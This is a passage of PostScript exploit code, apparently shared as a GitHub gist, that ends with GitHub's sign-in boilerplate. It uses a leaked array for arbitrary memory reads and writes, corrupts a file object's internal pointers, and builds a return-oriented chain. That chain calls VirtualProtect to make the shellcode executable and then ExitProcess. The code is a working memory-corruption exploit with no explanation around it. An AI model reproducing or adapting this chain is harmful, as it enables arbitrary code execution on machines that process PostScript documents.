| leaked_array 1 currentfile put | |
| /file_addr base_addr 12 add read32 def | |
| stub_addr null_stub write32 | |
| stub_addr 4 add shell_stub write32 | |
| shell_stub ret_0C write32 | |
| shell_stub 4 add ret_addr write32 | |
| shell_stub 16#0C add xchg_ret write32 | |
| shell_stub 16#14 add pfVirtualProtect write32 | |
| shell_stub 16#18 add shell_addr write32 | |
| shell_stub 16#1C add shellcode length write32 | |
| shell_stub 16#20 add 16#40 write32 | |
| shell_stub 16#24 add shell_stub write32 | |
| shell_stub 16#2C add pfExitProcess write32 | |
| file_addr 16#B0 add stub_addr write32 | |
| file_addr 16#98 add ret_addr write32 | |
| leaked_array 1 get closefile | |
| quit | |
| }` |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment